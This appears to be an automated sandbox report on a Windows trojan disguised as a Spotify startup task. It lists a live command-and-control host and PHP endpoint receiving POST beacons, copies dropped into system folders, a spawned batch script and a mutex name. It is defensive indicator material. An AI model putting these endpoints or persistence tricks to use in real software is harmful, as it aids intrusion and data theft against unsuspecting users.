Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 115583cm.n9shteam2.top

Source: unknown

HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:22:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:22:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:22:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:22:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:23:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:23:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:23:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:24:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 28 Sep 2024 01:24:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Source: JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002905000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.000000000301E000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.000000000316C000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003719000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003548000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.0000000003379000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.0000000003487000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000003113000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115583cm.n9shteam2.top
Source: JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115583cm.n9shteam2.top/
Source: JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002905000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.000000000301E000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1825174326.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003548000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2191980929.0000000001057000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads.php
Source: yQrCGtNgsf.exe, 00000000.00000002.1532044343.0000000002DF4000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000007.00000002.1617677751.0000000002905000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1751164556.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1827430038.000000000301E000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1953590953.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2039412444.0000000003548000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000023.00000002.2117584568.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2195444708.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000002D.00000002.2484265847.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\JPOyDhPFIytu.exe	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\JPOyDhPFIytu.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\599871f56ea49f	Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B3F0D48	0_2_00007FFB4B3F0D48
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B3F0E43	0_2_00007FFB4B3F0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 7_2_00007FFB4B3E0D48	7_2_00007FFB4B3E0D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 7_2_00007FFB4B3E0E43	7_2_00007FFB4B3E0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 7_2_00007FFB4B7D8910	7_2_00007FFB4B7D8910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3E0D48	13_2_00007FFB4B3E0D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3E0E43	13_2_00007FFB4B3E0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B411525	13_2_00007FFB4B411525
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B41D988	13_2_00007FFB4B41D988
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B41CF12	13_2_00007FFB4B41CF12
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F08B6	13_2_00007FFB4B3F08B6
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F03C5	13_2_00007FFB4B3F03C5
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F0ECD	13_2_00007FFB4B3F0ECD
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F14EA	13_2_00007FFB4B3F14EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F04FA	13_2_00007FFB4B3F04FA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F04D3	13_2_00007FFB4B3F04D3
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B7D8910	13_2_00007FFB4B7D8910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 18_2_00007FFB4B3D0D48	18_2_00007FFB4B3D0D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 18_2_00007FFB4B3D0E43	18_2_00007FFB4B3D0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 18_2_00007FFB4B7C8910	18_2_00007FFB4B7C8910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 25_2_00007FFB4B410D48	25_2_00007FFB4B410D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 25_2_00007FFB4B410E43	25_2_00007FFB4B410E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 25_2_00007FFB4B808910	25_2_00007FFB4B808910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F08B6	30_2_00007FFB4B3F08B6
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F03C5	30_2_00007FFB4B3F03C5
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F0ECD	30_2_00007FFB4B3F0ECD
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F14EA	30_2_00007FFB4B3F14EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F04FA	30_2_00007FFB4B3F04FA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F04D3	30_2_00007FFB4B3F04D3
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3E0D48	30_2_00007FFB4B3E0D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3E0E43	30_2_00007FFB4B3E0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B7D8910	30_2_00007FFB4B7D8910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B411525	35_2_00007FFB4B411525
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B41D988	35_2_00007FFB4B41D988
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B41CF12	35_2_00007FFB4B41CF12
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F08B6	35_2_00007FFB4B3F08B6
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F03C5	35_2_00007FFB4B3F03C5
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F0ECD	35_2_00007FFB4B3F0ECD
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F14EA	35_2_00007FFB4B3F14EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F04FA	35_2_00007FFB4B3F04FA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F04D3	35_2_00007FFB4B3F04D3
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3E0D48	35_2_00007FFB4B3E0D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3E0E43	35_2_00007FFB4B3E0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B7D8910	35_2_00007FFB4B7D8910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B3F0D48	40_2_00007FFB4B3F0D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B3F0E43	40_2_00007FFB4B3F0E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B4008B6	40_2_00007FFB4B4008B6
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B4003C5	40_2_00007FFB4B4003C5
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B400ECD	40_2_00007FFB4B400ECD
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B4014EA	40_2_00007FFB4B4014EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B4004FA	40_2_00007FFB4B4004FA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B4004D3	40_2_00007FFB4B4004D3
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B7E8910	40_2_00007FFB4B7E8910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B410D48	45_2_00007FFB4B410D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B410E43	45_2_00007FFB4B410E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4412EA	45_2_00007FFB4B4412EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B44D988	45_2_00007FFB4B44D988
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B44CF12	45_2_00007FFB4B44CF12
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B441538	45_2_00007FFB4B441538
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4208B6	45_2_00007FFB4B4208B6
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4203C5	45_2_00007FFB4B4203C5
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B420ECD	45_2_00007FFB4B420ECD
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4204FA	45_2_00007FFB4B4204FA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4214EA	45_2_00007FFB4B4214EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4204D3	45_2_00007FFB4B4204D3
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B808910	45_2_00007FFB4B808910
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B4412EA	51_2_00007FFB4B4412EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B44D988	51_2_00007FFB4B44D988
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B44CF12	51_2_00007FFB4B44CF12
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B441538	51_2_00007FFB4B441538
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B4208B6	51_2_00007FFB4B4208B6
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B4203C5	51_2_00007FFB4B4203C5
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B420ECD	51_2_00007FFB4B420ECD
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B4204FA	51_2_00007FFB4B4204FA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B4214EA	51_2_00007FFB4B4214EA
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B4204D3	51_2_00007FFB4B4204D3
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B410D48	51_2_00007FFB4B410D48
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B410E43	51_2_00007FFB4B410E43
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 51_2_00007FFB4B808910	51_2_00007FFB4B808910

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BDesMBdT.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254

Source: yQrCGtNgsf.exe, 00000000.00000000.1438001083.0000000000446000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs yQrCGtNgsf.exe
Source: yQrCGtNgsf.exe, 00000000.00000002.1537488842.000000001D9F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs yQrCGtNgsf.exe
Source: yQrCGtNgsf.exe, 00000000.00000002.1537488842.000000001D9F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs yQrCGtNgsf.exe
Source: yQrCGtNgsf.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs yQrCGtNgsf.exe

Source: yQrCGtNgsf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: yQrCGtNgsf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JPOyDhPFIytu.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JPOyDhPFIytu.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JPOyDhPFIytu.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JPOyDhPFIytu.exe2.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: yQrCGtNgsf.exe, YV7vTgf9a9Ets2qr8Kd.cs	Cryptographic APIs: 'CreateDecryptor'
Source: yQrCGtNgsf.exe, YV7vTgf9a9Ets2qr8Kd.cs	Cryptographic APIs: 'CreateDecryptor'
Source: yQrCGtNgsf.exe, YV7vTgf9a9Ets2qr8Kd.cs	Cryptographic APIs: 'CreateDecryptor'
Source: yQrCGtNgsf.exe, YV7vTgf9a9Ets2qr8Kd.cs	Cryptographic APIs: 'CreateDecryptor'

Source: yQrCGtNgsf.exe, 00000000.00000002.1531069647.000000000081C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.evad.winEXE@89/88@1/1

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

File created: C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe

Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

File created: C:\Users\user\Desktop\TzzXjEkC.log

Jump to behavior

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-RxLHfqluj2OpsLVcTfkV
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

File created: C:\Users\user\AppData\Local\Temp\5mIZs8oYbs

Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat"

Source: yQrCGtNgsf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: yQrCGtNgsf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yQrCGtNgsf.exe	ReversingLabs: Detection: 73%
Source: yQrCGtNgsf.exe	Virustotal: Detection: 61%

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

